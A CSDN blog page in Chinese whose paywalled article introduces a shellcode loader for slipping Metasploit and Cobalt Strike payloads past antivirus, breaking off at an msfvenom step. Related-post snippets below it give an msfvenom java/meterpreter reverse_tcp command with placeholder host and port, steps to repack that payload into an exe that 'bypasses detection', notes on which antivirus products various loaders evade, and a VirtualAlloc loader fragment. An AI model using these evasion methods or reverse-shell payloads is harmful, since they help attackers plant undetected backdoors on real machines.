java 加载shellcode_通用Shellcode加载器

最新推荐文章于 2024-02-02 00:18:23 发布
VIP文章 最新推荐文章于 2024-02-02 00:18:23 发布
阅读量920 收藏 1
点赞数
文章标签: java 加载shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35780426/article/details/114713420
版权

Shellcode加载器是一种基本的规避技术。尽管shellcode加载器通常可以促进payload的初始执行,但是启发式检测方法仍可以标记payload的其他方面和行为。例如,很多安全产品可能会在内存中时对其进行检测,或者将特定的网络流量检测为恶意。我们将研究一些适合与加载器结合使用的后期开发框架,并研究如何嵌入其他类型的二进制文件(例如.NET和已编译的PE二进制文件)。

博客系列的第一部分将介绍使用Shellcode进行后期开发payload的基本要领。在第二部分中,我们将为加载器实现其他功能,并查看某些功能的一些优点和缺点。因为我们使用shellcode来避免基于签名的检测,所以重要的是限制安全解决方案创建启动程序签名的可能性。二进制混淆是避免基于签名的检测的一种潜在解决方案,我们将编写一个python脚本来自动化加载器的生成和混淆。

Shellcode简介

在攻击中我们需要在目标上执行某些shellcode。诸如Metasploit和Cobalt Strike之类的后期开发框架都有自己的shellcode,但是这些框架中的payload由于被广泛使用而具有很高的检测率。但是,它们提供了一些功能,可以让我们自由发挥。此外,使用易于检测的shellcode将有助于我们确定加载器的回避功能在开发过程中是否正常运行。

Metasploit和Cobalt Strike提供both staged和stageless payload。使用both staged的payload时,shellcode会更小,从而导致启动程序二进制文件更小。然而,与stageless payload相比,both staged的payload被发现的可能更大。这可能是因为来自服务端的网络流量被标记为恶意,或者是因为检测到了攻击者用来执行最终payload的方法。在这片博客中,我们将使用stageless payload进行规避,因为我们不关心在将payload加载到内存之前的检测。有关both staged与stageless payload的更多信息,请查看深入了解无负载计量表的负载 OJ Reeves的博客文章。

上图演示了如何使用msfvenom生成原始shellcode。我们指定payload连接的IP和端口,并将输出保存到文件中。处理大文件时,该head命令只能用于打印第一个字符。在这里,我们使用该-c参数仅输出前100个字符,然后我们可以将其通过管道传递xxd以获得shellcode的十六进制转储。

msfv

最低0.47元/天 解锁文章
weixin_35780426
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
java shellcode_WIN下获取kernel基址的shellcode探讨(ZT)
weixin_34543510的博客
02-26 316
WIN下获取kernel基址的shellcode探讨gz1X[gz1x(at)tom(dot)com]2006.6.30[什么是shellcode]———————————Shellcode是一个攻击程序(Exploit)的核心代码,能够在溢出后改变系统的正常流程,取得系统的控制权,是一些汇编代码抽取成的16进制码;[经典溢出攻击流程]———————————1.查找Kernel32.dll基地址;2...
免杀对抗-java语言-shellcode免杀-源码修改+打包exe
xiaoheizi的博客
09-21 923
命令:msfvenom -p java/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=xxxx -f jar -o msf.jar。1.点击启动jd-gui,将生成的msf.jar拖入其中进行反编译,点击file—save all sources导出反编译后的内容。1.将exe4j打包的exe程序再使用inno工具和jdk环境打包合并到一起,将文件上传目标系统,成功绕过检测。命令:jar cvfm 名称.jar META-INF/MANIFEST.MF .
【网络资源学习笔记】ShellCode相关内容学习
天在等我,菜鸟想飞
07-14 2110
个人shellcode相关网络资源学习记录
c++之shellcode
qq_44657899的博客
05-26 3315
文章目录VirtualAlloc申请内存堆 VirtualAlloc申请内存 #include <windows.h> #include <iostream> #include <time.h> #pragma comment (lib, "winmm.lib") #pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") void startShellCode() { unsi
java shellcode_动态 ShellCode绕过杀软
weixin_32529429的博客
02-26 510
反病毒解决方案用于检测恶意文件,并且通常使用静态分析技术来区分二进制文件的好坏。如果是恶意文件本身包含恶意内容(ShellCode),那么依靠静态分析技术会非常有效,但如果攻击者使用轻量级的stager来代替下并将代码到内存中,会发生什么?事实证明这样做可以绕过大多数杀软的查杀。虽然这种绕过方法并不是新鲜技术,但绕过反病毒软件对于大多数后门来说都是必要的,在这篇文章中,我们将使用virsca...
基于Java实现的Shellcode源码+项目说明.zip
12-29
基于Java实现的Shellcode源码+项目说明.zip基于Java实现的Shellcode源码+项目说明.zip基于Java实现的Shellcode源码+项目说明.zip基于Java实现的Shellcode源码+项目说明.zip
CDL_shellcode_源码
10-02
This is a shellcode file for javascript
此源代码将生成 linux x86的 shellcode.rar_linux shellcode_shell
09-20
此源代码将生成 linux x86的 shellcode
基于Java实现的Shellcode.zip
最新发布
03-24
基于Java实现的Shellcode
shellcode
10-02
22年9月最新,采用shellcode密分离,支持msf和cs
java安卓辅助源码-injection-stuff:PE注入、DLL注入、进程注入、线程注入、代码注入、Shellcode注入、ELF注入、
06-04
java安卓辅助源码 Injection PE注入、DLL注入、进程注入、线程注入、代码注入、Shellcode注入、ELF注入、Dylib注入,当前包括400+工具和350+文章,根据功能进行了粗糙的分类 目录 -> -> -> -> -> -> -> -> -> PE注入 工具 [535星][20d] [C] peinjector - MITM PE file infector [407星][5m] [Assembly] 将PE文件转换为Shellcode [230星][3y] [C++] Inject custom code into PE file [This project is not maintained anymore] [220星][2y] [C++] C++ application that uses memory and code hooks to detect packers [196星][30d] [Py] Search for code cave in all binaries [126星][3y] [C++] 将ROP编码的shellcode打补丁到PE文
pythonshellcode免杀
qq_43884092的博客
10-12 827
编码,生成混淆后的shellcode,写入文件a.txt。可以过卡巴斯基静态和动态特征正常上线(这里使用的payload为。可以过火绒静态和动态特征正常上线,但无法过360和卡巴斯基。将密和编码后的shellcode代码通过网络下。pyinstaller进行打包(打包前删除所有注释)编码,生成混淆后的shellcode。可以过360静态和动态特征正常上线。可以过360静态和动态特征正常上线。可以过火绒静态和动态特征正常上线。可以过火绒静态和动态特征正常上线。
Java内存的利用技巧——通过jspShellcode
m0_69860228的博客
05-06 690
0x00 前言 本文基于rebeyond的《Java内存攻击技术漫谈》,以Tomcat环境为例,介绍通过jspShellcode的方法,开源代码,记录细节。 0x01 简介 本文将要介绍以下内容: 依赖tools.jarShellcode 自定义类Shellcode 0x02 依赖tools.jarShellcode 1.Java实现 通过enqueue函数Shellcode,测试代码: import java.lang.reflect.Method; public
java shellcode_各种语言实现Shellcode(暂时两种)
weixin_39660931的博客
02-26 528
原理:使用Shellcode分离的方法,方法很low,但是值得尝试Python参考自K8Shellcode混合密造轮子,造轮子QAQ(K8师傅的那个已经过不了检测了)编译用法的话则是结果如下虽然VT检出率挺高的但是过360还是可以的估计动态免杀是过不了的参考资料C/C++语言实现ShellcodeShellcode的代码C++这些东西还是不太懂得,大约就是申请虚拟内存,将shel...
投稿 | 初始ShellcodeShellcode执行工具编写思路
Ms08067安全实验室
04-19 477
文章来源|MS08067 公众号读者投稿本文作者:Arks7(Ms08067实验室读者)这是一段C++ 的代码,代码来之倾旋大佬的博客,先看大佬给的注释。#include// 入口...
免杀对抗-内存-shellcode转换-UUID+MAC+IPV4
xiaoheizi的博客
09-26 1278
IP地址与MAC地址在计算机里都是以二进制表示的,IP地址是32位的,而MAC地址则是48位(6个字节)的。IPv4使用32位(4字节)地址。介绍:通用唯一识别码(UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。此shellcode转换uuid的方法还可以使用:C# Python2 Go 等语言的shellcode实施免杀。2.使用32位的执行,将uuid类型的shellcode放到如下中。
免杀之浅谈shellcode
qq_46217803的博客
12-26 1674
VirtualAlloc:申请一个虚拟地址的空间,可以说为虚拟空间到物理空间的映射,简单来说,在虚拟空间操作,物理空间就会自动的分配物理地址。可以直接在内存中运行,不需要一个完整的pe结构,简单来说,内存能执行就能运行,没有啥依赖的“生存环境”设置一个指针类型的,也可以是别的,这里设置成NULL,这样系统会自动的去分配一个空间区域。就是一个类型属性,主要是内存分配的类型属性,可以去百度的,这里设置了两个值,去了解一下。还是以上的shellcode,本地生成的,用的是Visual Studio。
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode&密工具
lza20001103的博客
09-04 2249
ShellCode_Loader - Msf&CobaltStrike免杀ShellCode&密工具 文章目录ShellCode_Loader - Msf&CobaltStrike免杀ShellCode&密工具一、声明二、测试环境三、生成Msf_Payload四、生成CobaltStrike_Payload五、密Payload六、配置ShellCode七、打包可执行程序(EXE编译环境)八、上线测试 ShellCode_Loader - Msf&amp
多种基础Shellcode
Liyu_6618的博客
02-02 507
多种编程语言Shellcode的模板
用python制作shellcode
08-08
需要注意的是,为了编写一个完整的shellcode,可能还需要进一步的处理和代码,以适应不同的操作系统和处理架构。此外,也需要适当的授权和合法用途来使用此代码。 ### 回答3: Python是一种高级编程语言,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值